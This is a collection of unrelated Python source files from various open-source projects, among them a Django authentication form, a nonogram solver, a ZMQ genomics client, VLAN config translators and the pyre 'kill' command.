UsernameOrEmailAuthenticationForm(AuthenticationForm): username = forms.CharField(max_length=512) def clean(self): try: result = super(UsernameOrEmailAuthenticationForm, self).clean() return result except forms.ValidationError as ve: username = self.cleaned_data.get('username') password = 
self.cleaned_data.get('password') # Try username as email address try: user = User.objects.get(email=username) email_username = user.username self.user_cache = authenticate(username=email_username, password=password) if self.user_cache is None: raise ve except: raise ve class UserRegistrationForm(RegistrationFormUniqueEmail): first_name = forms.CharField(max_length=512) last_name = forms.CharField(max_length=512) #organization = forms.CharField(max_length=255, required=False) journalist = forms.BooleanField(required=False) timezone = forms.ChoiceField(choices=[(x, x) for x in zones]) mailing_address = forms.CharField(max_length=150, required=False) mailing_city = forms.CharField(max_length=50, required=False) mailing_state = forms.CharField(max_length=20, required=False) mailing_zip = forms.CharField(max_length=20, required=False) phone = forms.CharField(max_length=20, required=False) class InterestedPartyForm(forms.ModelForm): class Meta: model = InterestedParty exclude = ('activation_key', 'activated_on', 'followed_request',) from abc import ABC, abstractmethod import pytest from pycats import typeclass, instance def test_typeclass(): @typeclass class Foo(ABC): @abstractmethod def foo_fn(self): pass with pytest.raises(TypeError, match="typeclass"): Foo() with pytest.raises(TypeError, match="should inherit"): @typeclass class Foo: @abstractmethod def foo_fn(self): pass def test_instance(): @typeclass class Foo(ABC): @abstractmethod def foo_fn(self): pass @typeclass class Bar(Foo, ABC): @abstractmethod def bar_fn(self): pass def give_one(self): return 1 @instance(Foo, int) class IntFoo: def foo_fn(self): return self + 1 @instance(Bar, int) class IntBar: def bar_fn(self): return self * 2 actual = (1).foo_fn() expected = 2 assert actual == expected actual = (2).bar_fn() expected = 4 assert actual == expected actual = (3).give_one() expected = 1 assert actual == expected with pytest.raises(TypeError, match="typeclass instance"): IntBar() with pytest.raises(TypeError, match="missing implementations"): @instance(Foo, str) class StrFoo: pass class Obj: def __init__(self, value): self.value = value @instance(Foo, Obj) class ObjFoo: def foo_fn(self): return self.value + 4 actual = Obj(3).foo_fn() expected = 7 assert actual == expected jokteur/hpx-dashboard # -*- coding: utf-8 -*- # # HPX - dashboard # # Copyright (c) 2020 - ETH Zurich # All rights reserved # # SPDX-License-Identifier: BSD-3-Clause """Module for integration into Jupyter notebooks""" from queue import Queue import threading import time from bokeh.plotting import output_notebook, show from ..common.logger import Logger from .data import DataAggregator from .tcp_listener import TCP_Server, handle_response from .components import scheduler_doc, tasks_doc, custom_counter_doc from .worker import worker_thread, WorkerQueue from ..common.constants import task_cmap def start(port=5267, auto_save=True, save_path="", import_path=""): """Starts the TCP server for incoming data and the bokeh ioloop. Can only be called once in a session. Arguments --------- port : int port on which the TCP client listens for incoming data auto_save : bool if True, the session will be automatically saved at save_path. A directory is created for each session `hpx_data.`. save_path : str path where the session will be saved. Is only used if auto_save==True import_path : str imports a previous session into the new session. Any new data coming to this session will be saved in the imported session. 
""" DataAggregator(auto_save=auto_save, save_path=save_path, import_path=import_path) tcp_queue = Queue() tcp_server = TCP_Server(queue=tcp_queue) tcp_server.listen(port) tcp_thread = threading.Thread(target=lambda: handle_response(tcp_queue)) tcp_thread.daemon = True tcp_thread.start() work_queue = WorkerQueue() work_thread = threading.Thread(target=lambda: worker_thread(work_queue)) work_thread.daemon = True work_thread.start() output_notebook() Logger().info(f"Server has started and is listening on port {port}") def scheduler(): """Shows the scheduler plot in a notebook.""" show(lambda doc: scheduler_doc({}, doc)) def tasks(cmap=task_cmap): """Shows the task plot in a notebook. Arguments --------- cmap : list, colormap, str colormap for the task plot. Usefull if you want to import your own task data into the DataAggregator and change the colors. Otherwise, if you just want to redefine the colormap of the task plot, the length should be 256 if given as a list. """ show(lambda doc: tasks_doc({"cmap": cmap}, doc)) def custom_counter(): """Shows the custom counter plot widget in a notebook.""" show(lambda doc: custom_counter_doc({}, doc)) def import_tasks_from_df(df, color_hash_dict=None): """Imports task data into a new collection in the DataAggregator. Arguments --------- df : pd.DataFrame dataframe that should have the columns `name`, `locality`, `worker_id`, `start` and `end` color_hash_dict : dict color lookup for the task names (used later for the cmap in the task plot). Lookup should point to floating numbers. """ DataAggregator().new_collection(time.time()) new_collection = DataAggregator().get_live_collection() new_collection.import_task_data(df, color_hash_dict) new_collection = DataAggregator().finalize_current_collection(time.time()) 10-100 from typing import Optional from yangify.translator import Translator, TranslatorData, unneeded class VlanConfigVlans(Translator): class Yangify(TranslatorData): path = "/ntc-vlan:vlan/config/vlans" def pre_process_list(self) -> None: if self.to_remove: for element in self.to_remove: self.result.add_command(f"no vlan {element['vlan-id']}") def pre_process(self) -> None: if self.replace: self.root_result.add_command(f"no vlan {self.key}") self.result = self.root_result.new_section(f"vlan {self.key}") def post_process(self) -> None: if self.result: self.result.add_command(" exit\n!") else: self.root_result.pop_section(f"vlan {self.key}") vlan_id = unneeded def name(self, value: Optional[str]) -> None: if value: self.yy.result.add_command(f" name {value}") else: self.yy.result.add_command(f" no name") def active(self, value: Optional[str]) -> None: if value: self.yy.result.add_command(f" no shutdown") else: self.yy.result.add_command(f" shutdown") class VlanConfig(Translator): class Yangify(TranslatorData): path = "/ntc-vlan:vlan/config" vlans = VlanConfigVlans class Vlan(Translator): class Yangify(TranslatorData): path = "/ntc-vlan:vlan" config = VlanConfig from spacy.lang.fr import French nlp = French() doc = nlp("J'ai un chat") # Recherche le hash pour le mot "chat" cat_hash = ____.____.____[____] print(cat_hash) # Recherche cat_hash pour obtenir la chaine cat_string = ____.____.____[____] print(cat_string) codesmith-gmbh/forge import json from codesmith.common import cfn def put_string_parameter(ssm, parameter_name, *, value, description): try: return ssm.put_parameter( Name=parameter_name, Description=description, Value=value, Overwrite=True, Type='String', Tier='Standard' ) except ssm.exceptions.ClientError as e: raise 
RuntimeError(f'Cannot put parameter with name {parameter_name}') from e def fetch_string_parameter(ssm, parameter_name): parameter = ssm.get_parameter( Name=parameter_name, WithDecryption=True ) return parameter['Parameter']['Value'] def put_json_parameter(ssm, parameter_name, *, value, description): return put_string_parameter(ssm, parameter_name, value=json.dumps(value), description=description) def fetch_json_parameter(ssm, parameter_name): return json.loads(fetch_string_parameter(ssm, parameter_name)) def silent_delete_parameter(ssm, parameter_name): try: ssm.delete_parameter(Name=parameter_name) except ssm.exceptions.ParameterNotFound: pass except ssm.exceptions.ClientError: pass return parameter_name def silent_delete_parameter_from_event(ssm, event): parameter_name = cfn.physical_resource_id(event) return silent_delete_parameter(ssm, parameter_name) #!/usr/bin/env python3 """ [Nonogram](https://en.wikipedia.org/wiki/Nonogram) solver. The input is a list of strings: * The first line contains width and height of the board, separated by the space character. * The next width of lines contain space-separated hints for the vertical lines. * The next height of lines contain space-separated hints for the horizontal lines. * (optional) The next height of lines contains a drawing of the semi-solved board, if one wants to start from a starting semi-solution. The characters used are defined in the class below and are, by default, as follows: * empty tile: `.`, * unknown tile: ` `, * occupied tile: `@`. """ import itertools import re import sys import time class NonogramNoSolutionError(Exception): """ Raised when trying to solve Nonogram with no solutions. """ class NonogramSolver: """ [Nonogram](https://en.wikipedia.org/wiki/Nonogram) solver. """ TILE_EMPTY = "." TILE_UNKNOWN = " " TILE_OCCUPIED = "@" def __init__(self, definition): try: self.width, self.height = self._line2list(definition[0]) except (IndexError, TypeError, ValueError): raise ValueError( "the first line of the definition must contain only width and" " height as two ints separated by one or more spaces", ) if len(definition) == self.width + self.height + 1: self.board = [ [self.TILE_UNKNOWN] * self.width for _ in range(self.height) ] elif len(definition) == self.width + 2 * self.height + 1: f = self.width + self.height + 1 t = self.width + 2 * self.height + 1 self.board = self._get_board(definition[f:t]) else: raise ValueError( "definition must contain width + height + 1 or" " width + 2 * height + 1 lines", ) self.vertical = [ self._line2list(line) for line in definition[1:self.width + 1] ] self.horizontal = [ self._line2list(line) for line in definition[self.width + 1:self.width + self.height + 1] ] if self._sum_hints(self.vertical) != self._sum_hints(self.horizontal): raise ValueError( "the sums of vertical and horizontal hints must match", ) self.iterations = None self.time = None @staticmethod def _line2list(line): """ Return a list of numbers from a space-separated string of numbers. """ return [int(v) for v in line.strip().split()] @staticmethod def _sum_hints(hints): """ Return a sum of all elements of a list of lists of `int` values. """ return sum(sum(line) for line in hints) @classmethod def from_file(cls, fname): """ Create an instance of `NonogramSolver` and populate it from a file. """ with open(fname) as f: return cls(list(f)) def _get_board(self, lines): """ Return a board (a list of lists of tiles) from given list of strings. 
""" if len(lines) != self.height: raise ValueError("invalid number of lines in the board") lines = [line.rstrip("\n") for line in lines] try: invalid_line_idx = next( idx for idx, line in enumerate(lines) if len(line) > self.width ) except StopIteration: pass else: raise ValueError( f"invalid number of columns in board's line" f" {invalid_line_idx + 1}", ) return [ list(line) + [self.TILE_UNKNOWN] * (self.width - len(line)) for line in lines ] def print_board(self): """ Print the current state of the board to standard output. """ for line_idx, line in enumerate(self.board): if line_idx and line_idx % 5 == 0: print() print(re.sub(r".{5}", r"\g<0> ", "".join(line))[:-1]) @classmethod def _get_hint(cls, line): """ Return a line of the board as a list of `int` values containing hints. """ result = list() is_occupied = False for tile in line: if tile == cls.TILE_OCCUPIED: if is_occupied: result[-1] += 1 else: is_occupied = True result.append(1) else: is_occupied = False return result @classmethod def _solve_line(cls, line, hints): """ Solve one line as much as possible. The algorithm tries all possible solution candidates that conform with `hints`. Those tiles that get the same value (empty or occupied) for all of the solution candidates are considered a part of the solution. The `line` is then updated with these elements. If no new elements are found, the method returns `None`. """ line_try = list(line) occupied_cnt = sum(1 for tile in line if tile == cls.TILE_OCCUPIED) hints_cnt = sum(hints) if hints_cnt == occupied_cnt: return None tries = { idx: (cls.TILE_EMPTY, cls.TILE_OCCUPIED) for idx, tile in enumerate(line) if tile == cls.TILE_UNKNOWN } intersection = None for one_try in itertools.product(*tries.values()): new_cnt = sum(1 for tile in one_try if tile == cls.TILE_OCCUPIED) if occupied_cnt + new_cnt != hints_cnt: continue for idx, tile in zip(tries.keys(), one_try): line_try[idx] = tile if cls._get_hint(line_try) == hints: if intersection is None: intersection = one_try else: intersection = tuple( i_tile if i_tile == t_tile else cls.TILE_UNKNOWN for i_tile, t_tile in zip(intersection, one_try) ) if intersection is None: return None if all(tile == cls.TILE_UNKNOWN for tile in intersection): return None else: for idx, tile in zip(tries.keys(), intersection): line_try[idx] = tile return line_try @classmethod def _line_is_solved(cls, line, hints): """ Return `True` if the line's number of occupied tiles matches `hints`. *Note:* This method assumes that the tiles don't contradict `hints` and only compares the total number of occupied tiles. The reason for this is simplicity because it is used on (semi-)solved lines which are already guaranteed not to contradict `hints`. """ total_occupied = sum(1 for tile in line if tile == cls.TILE_OCCUPIED) return total_occupied == sum(hints) @classmethod def _fill_done_line(cls, line): """ Replace all of the unknown tiles in the line with empty ones. """ line[:] = [ cls.TILE_EMPTY if tile == cls.TILE_UNKNOWN else tile for tile in line ] def _try_horizontal_lines(self, board, done_h): """ Try solving all horizontal lines (each of them once). 
""" result = False for idx, (line, hints) in enumerate(zip(board, self.horizontal)): if idx in done_h: continue line_try = self._solve_line(line, hints) if line_try is not None: line[:] = line_try result = True if self._line_is_solved(line, hints): self._fill_done_line(line) done_h.add(idx) return result def _fill_finished_vertical_lines(self, board, done_v): """ Replace unknown tiles with empty ones in all finished vertical lines. """ for idx, hints in enumerate(self.vertical): if idx in done_v: continue column = [line[idx] for line in board] if self._line_is_solved(column, hints): self._fill_done_line(column) for line, c_tile in zip(board, column): line[idx] = c_tile done_v.add(idx) def _try_vertical_lines(self, board, done_v): """ Try solving all vertical lines (each of them once). """ result = False for idx, hints in enumerate(self.vertical): if idx in done_v: continue column = [line[idx] for line in board] line_try = self._solve_line(column, hints) if line_try is not None: if self._line_is_solved(line_try, hints): self._fill_done_line(line_try) done_v.add(idx) for line, lt_tile in zip(board, line_try): line[idx] = lt_tile result = True return result def _fill_finished_horizontal_lines(self, board, done_h): """ Replace unknown tiles with empty ones in all finished horizontal lines. """ for idx, (line, hints) in enumerate(zip(board, self.horizontal)): if self._line_is_solved(line, hints): self._fill_done_line(line) done_h.add(idx) def solve(self): """ Solve the current board as much as possible. """ board = self.board done_h = set() done_v = set() start_time = time.time() for iteration in range(self.width * self.height): got_something_horz = self._try_horizontal_lines(board, done_h) if got_something_horz: self._fill_finished_vertical_lines(board, done_v) got_something_vert = self._try_vertical_lines(board, done_v) if got_something_vert: self._fill_finished_horizontal_lines(board, done_h) if not (got_something_horz or got_something_vert): break end_time = time.time() self.time = end_time - start_time self.iterations = iteration + 1 if __name__ == "__main__": try: solver = NonogramSolver.from_file(sys.argv[1]) except IndexError: print(f"Syntax: {sys.argv[0]} filename") sys.exit(1) solver.solve() solver.print_board() print( f"Solved in {solver.time:.3f}s, using {solver.iterations} iterations.", ) from setuptools import setup with open("README.rst") as f: long_description = f.read() setup( name="django-templatetag-sugar", version=__import__("templatetag_sugar").__version__, author="", author_email="", description="A library to make Django's template tags sweet.", long_description=long_description, license="BSD", url="http://github.com/alex/django-templatetag-sugar/", packages=[ "templatetag_sugar", ], classifiers=[ "Environment :: Web Environment", "Intended Audience :: Developers", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Framework :: Django", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.2", "Programming Language :: Python :: 3.3", "Programming Language :: Python :: 3.4", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", ] ) import pypinyin import sys from tqdm import tqdm import json chars = set() with open('../data/char.txt', 'r', encoding='utf8', errors='ignore') as f: for c in 
f.readlines()[0]: chars.add(c) # print(chars[:5]) print(len(chars)) def bi_freq(): bi_freq_dic = dict() with open('../data/corpus.txt', 'r') as f: for line in tqdm(f.readlines()): for headpos in range(len(line) - 1): if (line[headpos] in chars) and (line[headpos + 1] in chars): if (line[headpos] + line[headpos + 1]) in bi_freq_dic: bi_freq_dic[line[headpos] + line[headpos + 1]] += 1 else: bi_freq_dic[line[headpos] + line[headpos + 1]] = 1 cnt_all_bi_chars = 0 for freq in bi_freq_dic.values(): cnt_all_bi_chars += freq for k in bi_freq_dic.keys(): bi_freq_dic[k] /= cnt_all_bi_chars return bi_freq_dic ''' bi_freq_dic = bi_freq() with open('../data/bi_freq_dic.json', 'w') as f: json.dump(bi_freq_dic, f) sys.exit(0) ''' with open('../data/bi_freq_dic.json', 'r') as f: bi_freq_dic = json.load(f) def triple_trans(): trans = dict() # build 2-words set bichars_dic = set() for char2 in bi_freq_dic.keys(): bichars_dic.add(char2) trans[char2] = dict() # trans[char2]['bifreq'] = bi_freq_dic[char2] with open('../data/corpus.txt', 'r') as f: for line in tqdm(f.readlines()): for index in range(len(line) - 2): two_chars = line[index] + line[index + 1] if (two_chars not in bichars_dic) or (line[index + 2] not in chars): continue if line[index + 2] not in trans[two_chars]: trans[two_chars][line[index + 2]] = 1 else: trans[two_chars][line[index + 2]] = 1 for subdickey in trans.keys(): tot = 0 for freq in trans[subdickey].values(): tot += freq if tot == 0: continue for k in trans[subdickey].keys(): trans[subdickey][k] /= tot return trans trip_dic = triple_trans() with open('../data/trip_dic.json', 'w', encoding='utf-8') as f: json.dump(trip_dic, f) # print(trans_dic['我']['爱']) import zmq, json import pandas as pd from ipyTrenaViz import * import time, os class Trena: def __init__(self, genomeName): socketContext = zmq.Context(); self.trenaServer = socketContext.socket(zmq.REQ) self.trenaServer.connect("tcp://trena:%s" % "5548") self.tv = ipyTrenaViz() display(self.tv) self.tv.setGenome(genomeName) def version(self): return(1.02) def display(self): display(self.tv) def ping(self): print("sending ping to treanServer") msg = {'cmd': 'ping', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) return(response) def showGenomicRegion(self, regionString): self.tv.showGenomicRegion(regionString); def getGenomicRegion(self): return(self.tv.getBrowserState()["chromLocString"]); def dataFrameFrom3partList(self, list): data = list['tbl'] rownames = list['rownames'] colnames = list['colnames'] df = pd.DataFrame(data) df.columns = colnames rownameList = {} for i in range(len(rownames)): rownameList[i] = rownames[i] df = df.rename(rownameList) return(df) def getModelNames(self): msg = {'cmd': 'getModelNames', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload) def getModel(self, name): msg = {'cmd': 'getModel', 'status': 'request', 'callback': '', 'payload': name} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] tbl = self.dataFrameFrom3partList(tblAsList) tbl.key = payload["key"] return(tbl) def getVariants(self, minScore, display, color, trackHeight=50): msg = {'cmd': 'getVariants', 'status': 'request', 'callback': '', 'payload': {'minScore': minScore}} 
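# Every Trena command below follows the same JSON-over-ZMQ REQ/REP round trip:
# build a msg dict with 'cmd', 'status', 'callback' and 'payload', send it with
# trenaServer.send_string(json.dumps(msg)), then block on recv_string() and parse
# the reply; the interesting data always sits under response["payload"].
# Table-valued replies put a 3-part list (keys 'tbl', 'rownames', 'colnames')
# under payload["tbl"], which dataFrameFrom3partList() turns back into a pandas
# DataFrame, and a cache key under payload["key"] that later calls (for example
# createGeneModel) use to reference the server-side copy of the table.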
self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] tbl = self.dataFrameFrom3partList(tblAsList) tbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(tbl, "variants >= %4.2f" % minScore, "SQUISHED", color, trackHeight) return(tbl) def getExpressionMatrixNames(self): msg = {'cmd': 'getExpressionMatrixNames', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload) def summarizeExpressionMatrices(self): msg = {'cmd': 'summarizeExpressionMatrices', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(self.dataFrameFrom3partList(payload)) def getFootprintsInRegion(self, display): payload = {"roi": self.getGenomicRegion()} msg = {'cmd': 'getFootprintsInRegion', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] regTbl = self.dataFrameFrom3partList(tblAsList) regTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(regTbl, "footprints", "SQUISHED", "blue") return(regTbl) def getDHSinRegion(self, display): payload = {"roi": self.getGenomicRegion()} msg = {'cmd': 'getDHSRegionsInRegion', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] regTbl = self.dataFrameFrom3partList(tblAsList) regTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(regTbl, "DHS", "SQUISHED", "darkreen") return(regTbl) def getDHSMotifsinRegion(self, display): payload = {"roi": self.getGenomicRegion()} msg = {'cmd': 'getDHSMotifsInRegion', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] regTbl = self.dataFrameFrom3partList(tblAsList) regTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(regTbl, "DHS motifs", "SQUISHED", "magenta") return(regTbl) def findVariantsInModel(self, modelName, shoulder, display): payload = {"modelName": modelName, "shoulder": shoulder}; msg = {'cmd': 'findVariantsInModel', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] varTbl = self.dataFrameFrom3partList(tblAsList) varTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(varTbl.loc[:, ['chrom', 'pos', 'pos', 'rsid']], "voi", "SQUISHED", "darkred") return(varTbl) def displayFootprints(self, url): self.tv.addBedTrackFromDataFrame(url) def addBedTrackFromDataFrame(self, tbl, trackName, trackMode, color, trackHeight=200): return(self.tv.addBedTrackFromDataFrame(tbl, trackName, trackMode, color, trackHeight)) def displayGraphFromFile(self, filename, modelNames): self.tv.displayGraphFromFile(filename, modelNames) def setStyle(self, filename): self.tv.setStyle(filename) def sessionInfo(self): msg = {'cmd': 'getSessionInfo', 'status': 'request', 
'callback': '', 'payload': ""} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload); def listSharedData(self): msg = {'cmd': 'listSharedData', 'status': 'request', 'callback': '', 'payload': ""} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload); def createGeneModel(self, targetGene, solverNames, tbl_regRegions, tfMap, matrixName): payload = {'targetGene': targetGene, 'solverNames': solverNames, 'tblRegulatoryRegionsCacheKey': tbl_regRegions.key, # used to look up in cache 'tfMap': tfMap, 'matrixName': matrixName} msg = {'cmd': 'createGeneModel', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] tbl = self.dataFrameFrom3partList(tblAsList) tbl.key = payload["key"] return(tbl) def displayMultiModelGraph(self, targetGene, modelList): modelNames = list(modelList.keys()) for modelName in modelNames: print(' now reducing modelName %s' % modelName) tbl = modelList[modelName]['model'] modelList[modelName]['model'] = tbl.key tbl = modelList[modelName]['regions'] modelList[modelName]['regions'] = tbl.key payload = {"targetGene": targetGene, "models": modelList}; msg = {'cmd': 'buildMultiModelGraph', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) g_json = response["payload"] open("g.json", "w") f = open("g.json", "w") f.write(g_json) f.close() self.displayGraphFromFile("g.json", modelNames) print("after calling displayGraphFromFile"); #return(payload) def createTaggedDataFrame(self, rows, columns): payload = {'rows': rows, 'cols': columns} msg = {'cmd': 'createTaggedDataFrame', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] pTbl = self.dataFrameFrom3partList(tblAsList) pTbl.key = payload["key"] return(pTbl) def findTaggedDataFrameOnServer(self, tbl): payload = tbl.key msg = {'cmd': 'identifyTaggedDataFrame', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload) def setWidgetHeight(self, newHeight): self.tv.setWidgetHeight(newHeight) Application/dice_hand.py1-10 """Dice hand imports.""" import dice class Dicehand(): """Dice hand class.""" def __init__(self): """Initialize class attributes.""" self.current_score = 0 self.dice_value = dice.Dice() def get_round_score(self): """Return the current score.""" return self.current_score def throw(self, die_1, die_2): """Generate a number and returns a number.""" die_1_throw = die_1.throw() die_2_throw = die_2.throw() if die_1_throw == 1 or die_2_throw == 1: self.current_score = 0 return die_1_throw, die_2_throw if die_1_throw != 1 and die_2_throw != 1: self.current_score += die_1_throw + die_2_throw return die_1_throw, die_2_throw darklab8/darklab_darkbot import functools from types import SimpleNamespace timedelta = SimpleNamespace(small=5, medium=10, big=20, super_big=40) def execute_in_storage(storage): """Move main code being executed from discord.commands to my own code sections, which can 
be much easily tested """ def decorator_repeat(func): @functools.wraps(func) async def wrapper_repeat(*args, **kwargs): # print('executing '+func.__name__) methods = func.__name__.split('_') category = methods[0] operation = methods[1] ctx = args[0] names = args[1:] await ctx.send(f'executing {methods} operation ' f'for objects {names}, {ctx.author.mention}') category_controller = getattr(storage, category) await getattr(category_controller, operation)(ctx.channel.id, names) return await func(*args, **kwargs) return wrapper_repeat return decorator_repeat # -*- coding: utf-8 -*- from qcloudsdkcore.request import Request class ContentTranscodeRequest(Request): def __init__(self): super(ContentTranscodeRequest, self).__init__( 'wenzhi', 'qcloudcliV1', 'ContentTranscode', 'wenzhi.api.qcloud.com') def get_tohtml(self): return self.get_params().get('tohtml') def set_tohtml(self, tohtml): self.add_param('tohtml', tohtml) def get_url(self): return self.get_params().get('url') def set_url(self, url): self.add_param('url', url) banner/views.py # Create your views here. from django.db.models.base import Model from rest_framework import generics from banner.models import Banner from banner.serializers import BannerSerializer class BannerList(generics.ListAPIView): queryset = Banner.objects.all() serializer_class = BannerSerializer class BannerSingle(generics.RetrieveAPIView): queryset = Banner.objects.all() serializer_class = BannerSerializer adrien1018/app0 from typing import Dict from . import analysis from .series import SeriesModel from ..analyses_settings import experiment_analyses, computer_analyses class AnalysisManager: @staticmethod def track(run_uuid: str, data: Dict[str, SeriesModel]): for ans in experiment_analyses: ans.get_or_create(run_uuid).track(data) @staticmethod def track_computer(computer_uuid: str, data: Dict[str, SeriesModel]): for ans in computer_analyses: ans.get_or_create(computer_uuid).track(data) @staticmethod def get_handlers(): return analysis.URLS @staticmethod def get_db_indexes(): return analysis.DB_INDEXES @staticmethod def get_db_models(): return analysis.DB_MODELS # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import logging import os import shutil import signal from pathlib import Path import psutil from ... import ( commands, configuration as configuration_module, find_directories, recently_used_configurations, ) from . 
import remote_logging, servers, server_connection LOG: logging.Logger = logging.getLogger(__name__) PYRE_FIRE = """ ', ,c: ', ;cc: ,:l; ';:lll: 'cllc' 'clllll: ;loooc' 'cllllllc' ;looool, :llllllll, :, 'looooool' ;lollllllo: ;ll; ;ooooooool, 'loooooloool; ,clll: cdoddoooooo; ;oooooooooool: ;loooll: cddddddddodo; cooooooooooooolloooooool; ;ddddddddddo; 'loooooooooooooooooooooooc' cdddddddddc 'ldddddooooooooooooooooooo, ,coodolc; cddddddddddoooooooooooooo; ' ,oddddddddddddddddodooooo; ,::::::::::::, :ddddddddddddddddddddddl' 'lddddddddddxd: :ddddddddddddddddddddd: ;odddddddddddl, ;oxdddddddddddddddddl' 'ldddddddddddo: ,:ldxddxddddddddddl' :ddddddddddddl' cdxxxxxxxdddddl' ,ldddddddddddo; ,oxxxxxxxxxdc :ddddddddddddc;' 'cdxxxxxxo; ,ldddddddddddxo; ;dxxxo: cdddddddddddddc 'lo: ;oddddddddddddo, 'cddddddddddddd: ;odddddddddddddl, :ddddddddddddddddd: ,ldddddddddddddddddddl, :odddddddddddddddddddddo: 'ldddddddddddddddddddddddddl' ;odddddddddddl, ,ldddddddddddo; 'cdddddddddddd: :ddddddddddddc' ;odddddddddddo, ,odddddddddddo; cddddddddddddc cddddddddddddc ;oxddxddxddddo; ;odxxxxddddxxo, ;:::::::::::;' ';:::::::::::; """ def _kill_processes_by_name(name: str) -> None: for process in psutil.process_iter(attrs=["name"]): if process.info["name"] != name: continue # Do not kill the `pyre kill` command itself. pid_to_kill = process.pid if pid_to_kill == os.getpgid(os.getpid()): continue try: LOG.info(f"Killing process {name} with pid {pid_to_kill}.") os.kill(pid_to_kill, signal.SIGKILL) except (ProcessLookupError, PermissionError) as exception: LOG.debug( f"Failed to kill process {name} with pid {pid_to_kill} " + f"due to exception {exception}" ) def _kill_binary_processes(configuration: configuration_module.Configuration) -> None: LOG.warning("Force-killing all running pyre servers.") LOG.warning( "Use `pyre servers stop` if you want to gracefully stop all running servers." 
) binary = configuration.get_binary_respecting_override() if binary is not None: _kill_processes_by_name(binary) def _kill_client_processes(configuration: configuration_module.Configuration) -> None: _kill_processes_by_name(find_directories.CLIENT_NAME) # TODO (T85602687): Run `buck kill` once buck is supported by the server def _delete_server_files(configuration: configuration_module.Configuration) -> None: socket_root = server_connection.get_default_socket_root() LOG.info(f"Deleting socket files logs under {socket_root}") for socket_path in servers.get_pyre_socket_files(socket_root): try: socket_path.unlink() except FileNotFoundError: pass except OSError as error: LOG.warning(f"Failed to remove socket file at `{socket_path}`: {error}") log_directory = Path(configuration.log_directory) / "new_server" LOG.info(f"Deleting server logs under {log_directory}") try: shutil.rmtree(str(log_directory), ignore_errors=True) except OSError: pass # TODO(T92826668): Delete files under artifact root def _delete_caches(configuration: configuration_module.Configuration) -> None: dot_pyre_directory = configuration.dot_pyre_directory resource_cache_directory = dot_pyre_directory / "resource_cache" LOG.info( f"Deleting local binary and typeshed cache under {resource_cache_directory}" ) try: shutil.rmtree(str(resource_cache_directory), ignore_errors=True) recently_used_configurations.Cache(dot_pyre_directory).delete() except OSError: pass # TODO (T85602687): Try to remove buck builder cache as well once buck is # supported by the server @remote_logging.log_usage(command_name="kill") def run( configuration: configuration_module.Configuration, with_fire: bool ) -> commands.ExitCode: try: _kill_binary_processes(configuration) _kill_client_processes(configuration) # TODO (T85602550): Store a rage log before this happens. # TODO (T85614630): Delete client logs as well. _delete_server_files(configuration) _delete_caches(configuration) if with_fire: LOG.warning( ( "Note that `--with-fire` adds emphasis to `pyre kill` but does" + f" not affect its behavior.\n{PYRE_FIRE}" ) ) LOG.info("Done\n") return commands.ExitCode.SUCCESS except Exception as error: raise commands.ClientException( f"Exception occured during `pyre kill`: {error}" ) from error abdulnsheikh/pythonArtificial intelligence/Matplotlib/Tutorial #1/notes.py # # Tutorial #1 # Median Scientist Salary by Age s_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35] s_y = [39496, 43000, 47752, 50320, 54200, 57000, 63316, 65928, 68317, 69748, 74752] # Median Salaries Of a Computer Scientist by Age s_cs_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35] s_cs_y = [46372, 49876, 54850, 58287, 64016, 66998, 71003, 71000, 72496, 76370, 84640] #!/usr/bin/env python import sys import click import logging from pathlib import Path from typing import TextIO from typing import Union, 